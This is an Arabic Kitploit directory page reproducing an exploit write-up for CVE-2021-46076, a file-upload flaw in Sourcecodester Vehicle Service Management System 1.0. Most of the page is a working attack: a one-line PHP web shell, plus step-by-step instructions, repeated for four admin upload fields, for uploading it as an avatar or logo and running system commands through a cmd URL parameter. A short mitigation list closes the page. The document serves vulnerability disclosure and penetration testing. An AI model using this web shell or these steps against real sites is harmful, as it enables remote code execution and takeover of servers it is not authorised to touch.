Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 عرضة لثغرة رفع الملفات. يمكن للمهاجم رفع ملف PHP خبيث عبر نقاط نهاية متعددة مما يؤدي إلى تنفيذ التعليمات البرمجية. | Kitploit
أدوات/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 عرضة لثغرة رفع الملفات. يمكن للمهاجم رفع ملف PHP خبيث عبر نقاط نهاية متعددة مما يؤدي إلى تنفيذ التعليمات البرمجية.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

CVE-2021-46076

عنوان الاستغلال: نظام إدارة خدمة المركبات - رفع ملفات 'متعدد' يؤدي إلى تنفيذ الأكواد

مؤلف الاستغلال: SANU P.L

CVE: CVE-2021-46076

CVSS: 8.8 عالية

المراجع:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-code-execution
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46076
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46076

الوصف:

نظام إدارة خدمة المركبات من Sourcecodester الإصدار 1.0 عرضة لثغرة رفع الملفات. يمكن للمهاجم رفع ملف php خبيث عبر نقاط نهاية (endpoints) متعددة مما يؤدي إلى تنفيذ الأكواد.

1. نظام إدارة خدمة المركبات - 'حسابي' (/admin/?page=user)

الاستغلال:

  1. سجّل الدخول إلى لوحة التحكم http://localhost/vehicle_service/admin
  2. انتقل إلى قسم حسابي http://localhost/vehicle_service/admin/?page=user

الحمولة:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. احفظ كود php أعلاه، على سبيل المثال: Cmd.php
  2. في قسم حسابي، أدخل جميع التفاصيل المطلوبة واختر ملف php في حقل الصورة الرمزية (Avatar).
  3. انقر على زر التحديث.
  4. افتح الصورة الرمزية في تبويب جديد.
  5. أضف معامل cmd إلى الرابط ونفّذ الأوامر.
  6. الرابط النهائي: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. نفّذ جميع أوامر النظام، على سبيل المثال: id, whoami, pwd إلخ.

2. نظام إدارة خدمة المركبات - 'قائمة المستخدمين' (/admin/?page=user/manage_user)

الاستغلال:

  1. سجّل الدخول إلى لوحة التحكم http://localhost/vehicle_service/admin
  2. انتقل إلى قسم قائمة المستخدمين وانقر على زر إنشاء جديد.

الحمولة:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. احفظ كود php أعلاه، على سبيل المثال: Cmd.php
  2. في صفحة إنشاء مستخدم جديد، أدخل جميع التفاصيل المطلوبة واختر ملف php في حقل الصورة الرمزية (Avatar).
  3. انقر على زر الحفظ.
  4. افتح الصورة الرمزية في تبويب جديد.
  5. أضف معامل cmd إلى الرابط ونفّذ الأوامر.
  6. الرابط النهائي: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. نفّذ جميع أوامر النظام، على سبيل المثال: id, whoami, pwd إلخ.

3. نظام إدارة خدمة المركبات - 'الإعدادات - شعار النظام' (/admin/?page=system_info)

الاستغلال:

  1. سجّل الدخول إلى لوحة التحكم http://localhost/vehicle_service/admin
  2. انتقل إلى قسم الإعدادات http://localhost/vehicle_service/admin/?page=system_info

الحمولة:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. احفظ كود php أعلاه، على سبيل المثال: Cmd.php
  2. في قسم الإعدادات، أدخل جميع التفاصيل المطلوبة واختر ملف php في حقل شعار النظام (System Logo).
  3. انقر على زر التحديث.
  4. افتح صورة شعار النظام في تبويب جديد.
  5. أضف معامل cmd إلى الرابط ونفّذ الأوامر.
  6. الرابط النهائي: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. نفّذ جميع أوامر النظام، على سبيل المثال: id, whoami, pwd إلخ.

4. نظام إدارة خدمة المركبات - 'الإعدادات - غلاف الموقع' (/admin/?page=system_info)

الاستغلال:

  1. سجّل الدخول إلى لوحة التحكم http://localhost/vehicle_service/admin
  2. انتقل إلى قسم الإعدادات http://localhost/vehicle_service/admin/?page=system_info

الحمولة:

root@kitploit:~
<?php system($_GET['cmd']);?>
  1. احفظ كود php أعلاه، على سبيل المثال: Cmd.php
  2. في قسم الإعدادات، أدخل جميع التفاصيل المطلوبة واختر ملف php في حقل غلاف الموقع (Website Cover).
  3. انقر على زر التحديث.
  4. افتح صورة غلاف الموقع في تبويب جديد.
  5. أضف معامل cmd إلى الرابط ونفّذ الأوامر.
  6. الرابط النهائي: http://localhost/vehicle_service/uploads/1640632740_Cmd.php?cmd=whoami
  7. نفّذ جميع أوامر النظام، على سبيل المثال: id, whoami, pwd إلخ.

التأثير:

يمكن للمهاجم رفع ملف php خبيث عبر نقاط نهاية (endpoints) متعددة، مما يؤدي إلى تنفيذ الأكواد.

التخفيف:

يُنصح بتنفيذ ما يلي:

  • لا تقبل أبدًا اسم الملف وامتداده مباشرةً دون وجود مرشح قائمة بيضاء (white-list).
  • إذا لم تكن هناك حاجة لأحرف Unicode، يُنصح بشدة بقبول الأحرف الأبجدية الرقمية (alpha-numeric) ونقطة واحدة فقط كمدخل لاسم الملف والامتداد.
  • حدّد حجم الملف إلى قيمة قصوى لمنع هجمات حجب الخدمة.
  • يجب ألا يمتلك دليل الرفع أي صلاحية "تنفيذ".
  • لا تعتمد على التحقق من جانب العميل فقط.
تنزيل الأداة